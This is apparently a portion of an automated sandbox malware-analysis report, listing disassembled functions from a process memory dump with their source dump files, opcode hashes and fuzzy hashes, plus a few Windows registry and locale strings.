                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                          Function 00ACFC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                          Function 00ACFC30 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                          Function 00ACFC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                          Function 00ACFC48 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                          Function 00ACFD8C Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                          Function 00AD1D80 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                          Function 00ACFD5C Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                          • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                          • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                          • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                          Function 00ACFEA0 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                          Function 00ACFED0 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                          Function 00ACFE24 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                          • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                          • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                          • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                          Function 00ACFFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                          Function 00ACFFFC Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                          • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                          • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                          • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                          Function 00ACFF34 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                          • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                          • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                          • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                          Function 00AF8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 00AF8827
                                                                                          • WindowsExcludedProcs, xrefs: 00AF87C1
                                                                                          • Kernel-MUI-Language-SKU, xrefs: 00AF89FC
                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 00AF8914
                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 00AF87E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcspbrk
                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                          • API String ID: 402402107-258546922
                                                                                          • Opcode ID: 467db9de27376aaeb32e9e302d17db325c8eea333dd868a161f7fe90ec422136
                                                                                          • Instruction ID: 5d767139f74d7be157c1bd0fb3527aa856e027e2c15ccd0644b7a8f30bfae5aa
                                                                                          • Opcode Fuzzy Hash: 467db9de27376aaeb32e9e302d17db325c8eea333dd868a161f7fe90ec422136
                                                                                          • Instruction Fuzzy Hash: 03F1D5B2D00249EFCF11EFD9CA819EEB7B9FB08304F15446AF606A7211EB359A45DB50
                                                                                          Function 00B6822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnlen
                                                                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                          • API String ID: 3628947076-1387797911
                                                                                          • Opcode ID: dc51bc62b67d4b134f87cef44e56c2900db7057ea83137b35a8b65bf55498c85
                                                                                          • Instruction ID: 46fda3354ee8204a6314435fbf0eacb7a53dc21debc32db52e4460694b2673ea
                                                                                          • Opcode Fuzzy Hash: dc51bc62b67d4b134f87cef44e56c2900db7057ea83137b35a8b65bf55498c85
                                                                                          • Instruction Fuzzy Hash: B341A875240219BAEB119A90DC82FDE77ECEF09B44F1042A2BA04E5191DFB4DB5197A8
                                                                                          Function 00B113CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
